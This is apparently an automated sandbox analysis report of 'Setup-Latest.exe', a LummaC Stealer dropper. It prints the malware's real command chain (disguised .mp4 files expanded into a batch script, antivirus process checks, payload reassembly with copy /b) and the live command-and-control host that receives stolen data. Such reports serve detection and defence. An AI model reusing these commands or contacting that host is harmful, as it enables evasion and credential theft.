
Windows Analysis Report
Setup-Latest.exe

Overview

General Information

Sample name: Setup-Latest.exe
Analysis ID: 1615219
MD5: d905d14928e2766285ed7ca83eaaf4b3
SHA1: 5d27b2c538c81f7819f7de1071c28ecd03c5bd2e
SHA256: 721f6073f9ec13d9a1b7cff7b7cfab342ec6fd5ebc1a95c006ae11198e8abfc9
Tags: AutoIT, exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • Setup-Latest.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\Setup-Latest.exe" MD5: D905D14928E2766285ED7CA83EAAF4B3)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7648 cmdline: expand Wide.mp4 Wide.mp4.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 7700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7708 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7752 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7792 cmdline: cmd /c md 562639 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7808 cmdline: extrac32 /Y /E Always.mp4 MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7836 cmdline: findstr /V "Yang" Labor MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7852 cmdline: cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7868 cmdline: cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Wages.com (PID: 7884 cmdline: Wages.com G MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7904 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7596, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth", ProcessId: 7752, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T16:55:55.172476+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:56.196791+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:57.459844+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:59.322762+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2025-02-14T16:56:00.447277+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | TCP
2025-02-14T16:56:01.763539+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2025-02-14T16:56:03.118342+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2025-02-14T16:56:05.414362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:55.683804+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:56.847472+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2025-02-14T16:56:05.960131+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:55.683804+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2025-02-14T16:55:58.812520+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP

AV Detection

Source: Setup-Latest.exe | Virustotal: Detection: 19%
Source: Setup-Latest.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.0% probability
Source: Setup-Latest.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: Setup-Latest.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\562639
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\562639\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 46
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=O8W7XY041YOVJERDM2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18163
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=L1XEQBKUETKEOFX6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8772
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0NOQB56K
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20377
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WF1N3UL2JOP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2617
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=64YFSWT7I6O5L
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 558936
    Host: zengardxen.cyou
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 80
    Host: zengardxen.cyou
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ
Source: global traffic | DNS traffic detected: DNS query: zengardxen.cyou
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zengardxen.cyou
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Setup-Latest.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Wages.com, 0000000D.00000000.1763368679.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Volunteers.9.dr, Wages.com.1.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Wages.com.1.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
Source: C:\Users\user\Desktop\Setup-Latest.exe | File created: C:\Windows\CompletionMortgages
Source: C:\Users\user\Desktop\Setup-Latest.exe | File created: C:\Windows\OlympicsGreek
Source: C:\Users\user\Desktop\Setup-Latest.exe | File created: C:\Windows\PavilionDressed
Source: C:\Users\user\Desktop\Setup-Latest.exe | File created: C:\Windows\SpaMeetings
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_0040737E
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_00406EFE
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004079A2
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004049A8
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\562639\Wages.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: String function: 004062CF appears 58 times
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@28/23@2/1
Source: C:\Users\user\Desktop\Setup-Latest.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Users\user\Desktop\Setup-Latest.exe | File created: C:\Users\user\AppData\Local\Temp\nsdD8A1.tmp
Source: Setup-Latest.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Setup-Latest.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Setup-Latest.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Setup-Latest.exe | File read: C:\Users\user\Desktop\Setup-Latest.exe
Source: unknown | Process created: C:\Users\user\Desktop\Setup-Latest.exe "C:\Users\user\Desktop\Setup-Latest.exe"
Source: C:\Users\user\Desktop\Setup-Latest.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Wide.mp4 Wide.mp4.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 562639
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Always.mp4
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Yang" Labor
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\562639\Wages.com Wages.com G
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Setup-Latest.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\expand.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textinputframework.dll
